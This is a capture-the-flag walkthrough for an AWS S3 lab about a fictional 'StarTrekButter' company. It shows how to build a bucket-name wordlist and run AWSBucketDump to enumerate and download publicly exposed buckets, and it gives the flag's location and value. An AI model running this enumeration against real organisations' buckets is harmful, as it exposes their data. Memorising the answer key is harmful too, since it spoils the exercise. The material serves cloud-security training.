A Bucket Load of Trouble - Solution
Introduction
GlobalButter is launching a new product called 'StarTrekButter'. This will be a subsiadary of GlobalButter.
The admins of 'StarTrekButter' like to use a lot of AWS services, their favorite being Amazon S3.
However, they are very bad at security. There is news in the underground that someone has leaked some sensitive files into an S3 bucket but have poorly configured it making it available to the public.
Just some additional info, last week two buckets were discovered called 'admin.startrekbutter' and 'hr.startrekbutter'.
Starting point
Download the custom dictionary from the link given below
Update the dictionary to fit the company's naming convention
Your task
Find the name of the misconfigured S3 bucket
Find the 'flag.txt' file in the bucket
Note: Use this custom dictionary stolen from their servers to find the bucket and the flag file. You may have to edit the dictionary to align with the company's naming convention as shown above!
https://s3.amazonaws.com/awscloudsec-ctf-helpfiles/startrekbutter-bucketnames.txtWalkthrough
Download the dictionary from the URL provided
https://s3.amazonaws.com/awscloudsec-ctf-helpfiles/startrekbutter-bucketnames.txtAppend the notation ".startrekbutter" to each word in the dictionary
Use AWSBucketDumper to hunt for these buckets using the custom dictionary and a zero byte grep file
touch s.txtUse the -d to download the files so that you can check the content offline (this may take some time)
python AWSBucketDump.py -l startrekbutter-bucketnames.txt -g s.txt -D -d 1If this is taking too long, simply look through the output to see the flag.txt
Flag is in http://testlab.startrekbutter.s3.amazonaws.com/COM/flag.txt
The flag is "Buried_Inside_Buckets"Last updated